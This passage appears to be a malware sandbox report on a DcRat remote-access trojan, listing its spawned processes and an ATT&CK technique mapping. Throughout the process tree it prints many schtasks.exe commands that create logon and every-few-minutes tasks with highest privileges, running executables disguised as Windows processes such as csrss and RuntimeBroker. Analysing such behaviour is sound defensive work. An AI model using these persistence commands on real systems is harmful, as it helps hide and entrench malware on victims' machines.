- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\WmiPrvSE.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1320
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Public\AccountPictures\WmiPrvSE.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4448
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:964
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2456
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1412
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\conhost.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3856
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Admin\conhost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2632
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\conhost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1564
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Crashpad\reports\RuntimeBroker.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3344
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Crashpad\reports\RuntimeBroker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4264
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Crashpad\reports\RuntimeBroker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4500
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4656
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:5032
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:624
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Bridgereviewhostdhcp\MoUsoCoreWorker.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3624
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Bridgereviewhostdhcp\MoUsoCoreWorker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2456
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Bridgereviewhostdhcp\MoUsoCoreWorker.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:628

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4536

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5088

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1392

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4784

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery